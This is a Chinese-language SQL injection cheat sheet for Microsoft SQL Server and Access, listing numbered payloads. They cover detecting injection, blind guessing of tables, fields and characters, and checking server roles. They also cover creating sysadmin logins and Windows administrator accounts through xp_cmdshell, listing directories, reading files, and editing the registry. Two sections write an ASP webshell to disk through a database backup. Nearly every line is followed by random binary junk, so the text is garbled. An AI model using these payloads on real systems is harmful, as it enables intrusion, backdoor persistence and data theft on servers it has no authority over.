1.判断是否有注入;and 1=1 ;and 1=2
�v>B412�l
2.初步判断是否是mssql ;and user>0 f?)7M�R�=
6` TwP\!$/
3.注入参数是字符'and [查询条件] and ''=' Z��}u��Y%]
�)�-Hs]D:
4.搜索时没过滤参数的'and [查询条件] and '%25'=' }" vxYB!h3
Q�a )�+Tv�
5.判断数据库系统 2WFZ����6�
$a*7Q~���4
;and (select count(*) from sysobjects)>0 mssql ��7N[".V]c
�N�OXP�}M�
;and (select count(*) from msysobjects)>0 access lsOv#X-b�E
PD0&ep1h7G
bN zb#P#hP
��D�~ Y6%9
6.猜数据库 ;and (select Count(*) from [数据库名])>0 n�*wQgC'vw
i`r`Fj}-S-
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 m]�>z�dP�+
4F#H�$`�:[
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �@`�4T6eL5
^��WO3��,
9.(1)猜字段的ascii值(access) �{jB�>�]7
<Q9l'u]3$c
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 'QT~o-�U��
kWZY+jyt P
(2)猜字段的ascii值(mssql) W�{"�s�B:E
?I[8�rzBWU
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 `K.C���>68
�'@.6Rd �8
10.测试权限结构(mssql) /x ?@M�n>�
��VGeTX 4h
�nwKp�8mfP
(6�ga*5<�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��h2Nt���@
��jL\j$'KC
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �M0fN[!*z�
3&�^hf^y�g
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �7 m�Cf*|�
5�:IDl�1f5
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �-eF-r=FR�
{kk%�_��q�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- //2O#�Fg{/
?pW�1}:�z
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �;�um)JCXz
l&+�O*=#Hh
;and 1=(select IS_MEMBER('db_owner'));-- ��BJux5�Nh
r{R<J��?Y�
);��d�07\V
j9��>[^t3U
11.添加mssql和系统的帐户 Un�b2�D4&'
z1I�ev�a�]
;exec master.dbo.sp_addlogin username;-- z�K���5&,/
;exec master.dbo.sp_password null,username,password;-- h�$'6."I��
6U*CR=4�
�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 6^L��XctW.
�)�:�G%o�
;exec master.dbo.xp_cmdshell 'net user username password �U*=�E(��l
SPb�+H�19;
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kJ5z�['4�?
^^�"zjl*^
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ~-A"j\g�i"
��U���F!qp
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- @@���o�J@;
GB|>eZLv�<
t�VAo �o-%
&<e18L��7a
12.(1)遍历目录 L8�h3k��T
uMw�6b�=/U
;create table dirs(paths varchar(100), id int) N�z2�V�aZ�
47Z3�n��l?
;insert dirs exec master.dbo.xp_dirtree 'c:\' (2#�Xa�,pb
#s~;ss �,�
;and (select top 1 paths from dirs)>0 #]jl{K\f#X
�����,6�{z
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) MWv@]P_0p!
a��
-Pz�<*
-13}]Gls7Q
9-���T<gYl
(2)遍历目录 >Xg�J��o7u
e�
n~m)r3&
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Sxq�@��W8W
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ck���{S��
}?,?2U,8�:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��Q^f�{�H.
���4}m9,�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 $~��b6H]"9
i`gM> ��q&
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 <4G�y~��?
Nf��)Y�G!�
v=�@y�7P1�
r5~��W/e�E
13.mssql中的存储过程 �@bA�5u�Y!
$�@'B�B=�i
xp_regenumvalues 注册表根键, 子键 X�3}eq|r9
c�OV9g)7^O
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 M)oKti�av*
'd$R���Nqe
xp_regread 根键,子键,键值名 t�s,r��,{
XZKlE
F��?
;exec xp_regread ��&'>��m;W
h�EB5�=~A_
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 j�V}8VK*`+
�Np+P�Uu>
xp_regwrite 根键,子键, 值名, 值类型, 值 5bt>MoKxv�
i6KfH�\{�N
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 > mO*.'�Gm
p�Run5� )7
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �Qa�_�V��
g:�fvg�!_v
xp_regdeletevalue 根键,子键,值名 I*�N"_uKU�
-NJpq�l{Cb
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 t�/;�0/ql\
FJZ�'P�;3
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Hnt*,C�.�0
jXe�E]A"��
T>as�H����
.1�[.f}g$J
14.mssql的backup创建webshell '��{2�]:�
S�#M8}+ZD,
use model ,�)�[9RgsE
b$DiD�m���
create table cmd(str image); U/en�q,-F^
0]S�Wy�C
:
insert into cmd(str) values (''); �1�+Gq<]@G
N-�upN�uv�
backup database model to disk='c:\l.asp'; �[<�53_2]~
E��to"B"�
OCrT���zz8
�V��#w$�|2
15.mssql内置函数 _+B�y�=B.'
�HMF�2sc$N
;and (select @@version)>0 获得Windows的版本号 \eKXsO�"�d
1�.+O2qB��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa }%Mdf6LS64
M�
v��(Pp�
;and (select user_name())>0 爆当前系统的连接用户 S�vSO?H�!-
�o��08�g]a
;and (select db_name())>0 得到当前连接的数据库 D�@�La-K*5
N]
sbI�)Z@
�&AJ �b�x�
Y|LL]@��Lv
16.简洁的webshell k�";dK*hD,
C!�^A\T�7p
use model MOQ6&C`7�q
k3$��'K}=d
create table cmd(str image); "�j_iq"��J
"a[;�{s{{.
insert into cmd(str) values (''); qI���uo8o}
�,<L4tp+y0
backup database model to disk='g:\wwwtest\l.asp';
